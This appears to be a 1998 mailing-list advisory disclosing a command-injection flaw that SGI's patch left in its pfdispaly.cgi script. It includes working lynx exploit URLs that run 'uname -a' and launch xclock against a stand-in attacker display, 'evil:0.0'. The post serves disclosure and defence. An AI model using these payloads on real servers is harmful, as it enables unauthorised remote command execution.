perfomer_tools again

From: J.A. Gutierrez (spdat_private)
Date: Mon Apr 06 1998 - 18:16:01 PDT

        Hi

        There is already a patch from SGI to the pfdispaly.cgi
        '../..' bug.

        But it seems it fixes only that problem, without checking
        the rest of the code for similar vulnerabilities, so even
        after patch 3018 (04/01/98) you can try:

        $ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'

        uname -a\| file

        IRIX victim 6.2 03131015 IP22

        or

    $ lynx -dump \
    http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

        (You probably will notice this exploit is similar to that
        one on 'wrap'; it's nice to find that sometimes reusing
        code does work)

        The fix is easy (for this particular problem); so it's left
        to the reader.
        Anyway, if you're using SGI cgi's you should consider
        limiting the access to your domain...

    --
        J.A. Gutierrez                                   So be easy and free
                                                when you're drinking with me